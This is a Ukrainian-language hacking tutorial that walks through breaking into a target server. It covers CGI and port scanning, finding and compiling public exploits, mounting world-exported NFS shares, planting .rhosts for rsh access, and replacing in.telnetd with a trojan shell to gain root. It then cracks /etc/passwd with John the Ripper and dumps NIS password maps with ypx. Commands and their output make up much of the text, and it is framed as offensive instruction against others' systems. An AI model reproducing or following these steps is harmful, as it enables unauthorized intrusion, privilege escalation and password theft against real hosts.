C чого ж все таки починати злом сервера (сайту, сторінки і т. д.)
Отже, приступимо! Перше з чого варто почати це просканувати хост на стандартні сценарії CGi за допомогою спеціальних сканерів яких слава богу зараз предостатньо. Ну і що б ви не загубилися у виборі можу порадити кращий (ІМХО) на сьогоднішній день-це [email protected] Cgi Scanner наданий нам хак-групою [email protected], його можна завантажити з йх офіційного сайту www.cc.f2s.com ще правда є сканер від груааы Void (www.void.ru) Але він трохи поступається DCS по швидкості сканування. Ок, далі, сканер знайшов уразливий скрипт і ви запитаєте, що ж робити далі???, а далі вам треба знайти те, як використовувати цей експлоїт, я дам вам кілька
посилання де можна знайти опис цих помилок:

qwerty.nanko.ru (найбільш повне але Англійською)
www.void.ru
www.hack-crack.com

або ви можете просто зайти на один з таких сайтів і просто ввести уразливий скрипт в рядку пошуку:

www.packetstorm.securify.com
www.securityfocus.com
www.rootshell.com

Друге і мабуть головне — це сканування портів, для сканування можна використовувати будь-сканер портів(який — на ваш вибір їх зараз скрізь повно), але знову ж таки хотів би звернути вашу увагу на сканер Nscan який можна завантажити тут www.nscan.hypermart.net цей сканер має просто приголомшливою швидкістю сканування і досить просто в управлінні(правда на сайті лежить Shareware версія, яка буде працювати тільки 30 днів)

Після того як сканер знайшов відкриті порти вам треба пріконнектіться до кожного і подивитися яка версія програмного забезпечення встановлена на ньому, робиться це з допомогою клієнта TELNET який є навіть у Вынь95 (98,2000), в командному рядку TELNET ви пишете:

telnet>open www.target.com
і дивіться версію софта наприклад: WU-FTPD 2.6.0(1) Sendmail QPOP IMAP і тд. Після того як ви подивилися версію ви повинні знайти експлоїт під цю версію, йдете знову ж таки на:

www.securityfocus.com
www.packetstorm.securify.com
www.technotronic.com
і вводите в рядок пошуку назву програми та її версію.

Після того як ви завантажили експлоїт його як правило треба скомпілювати — тобто привести до робочого стану (як правило) так як більшість серверів в мережі висить на *NIX тобто ЮНІКС ЛІНУКС ИРИКс і тд, то і компілювати його треба під цими системами. Якщо у вас немає встановленого ЮНИКСА, то вам в будь-якому разі (якщо хочете чого не будь ламати потрібен Юнікс Шелл, тобто оболонка Юнікс). Безкоштовно її можна отримати на www.nether.net і тому подібних серверах (введіть на будь-якому пошуковику UNIX+SHELL+FREE)

Коли шелл отримано і експлоїт скачав то можна приступати до компилированию, зазвичай експлоїт (в більшості випадків) це програма на мові С для компіляції будемо використовувати компілятор GCC, отже в командному рядку оболонки пишемо:
gcc -o exploit exploit.c і нижимаем Enter.

Хочу так само відзначити, що програми в Юнікс подібний системах запускаються з “./”+ім’я програми, в нашому випадку експлоїт буде запускатися:
>./exploit

Третє, ще один досить популярний злом системи це перевірка на расшаренные папки, в Юнікс то можна перевірити за допомогою утиліти showmount, отже з оболонки запускаємо showmount:
>showmount -e www.target.com
і бачимо
/user/ Everyone
або щось інше, але якщо є Everyone то значить папка відкрита на монтування для всіх пишемо далі
>mount -t nfs target.remote.com:/user /mnt
потім переходми в каталог cd /mnt/home і встановлюємо .rhosts
>echo www.target.com user/.rhosts
далі робимо наступне:
>cat /etc/passwd
user::257:20::/: -дивимося користувача і створюємо такого ж у нас(якщо можливо)

> su — user
! Стаємо їм
$ rsh target.remote.com /bin/csh -i
Warning! No access to terminal, job control disabled!
! І заходимо на віддалену машину
% id
uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)
% ls -ldg /usr/etc

! Каталог доступний на запис

drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc
% grep telnet /etc/inetd.conf
telnet stream nowait root /usr/etc/in.telnetd in.telnetd

! Знайшли програму, що запускається
! під root«ом з нашого каталогу
% cd /usr/etc
% mv in.telnetd in.telnetd1
! створюємо троянського коня
% cat in.telnetd
>!/bin/sh
exec /bin/csh -i
% chmod 755 in.telnetd
! і запускаємо його
% telnet 127.1
Connecting 127.1.

Warning! No access to terminal, job control disabled!

> chown user /etc;
! Робимо /etc своїм
: command not found
> exit;
: command not found
Connection closed by foreign host.
> cd /etc

Після того як у нас є файл з паролями ви берете розшифровувача паролів Юнікс — John The Ripper запускаєте його і чекаєте поки расшифруются паролі потім з шелла коннект на 23 порт і вводите логін з паролем, і всі ви у системі!

І останнє на що я б хотів звернути увагу у цій статті це перевірка NIS сервера. З облочки запускаємо
>rpcinfo -p www.target.com | grep bind і якщо бачимо щось типу
120000 2 udp 2493 ypbind
То пробуємо сдлать наступне:
>ypx -o target.пароль-g target.remote.com
Беремо файл з паролями і запускаємо підбирач.
На цьому все!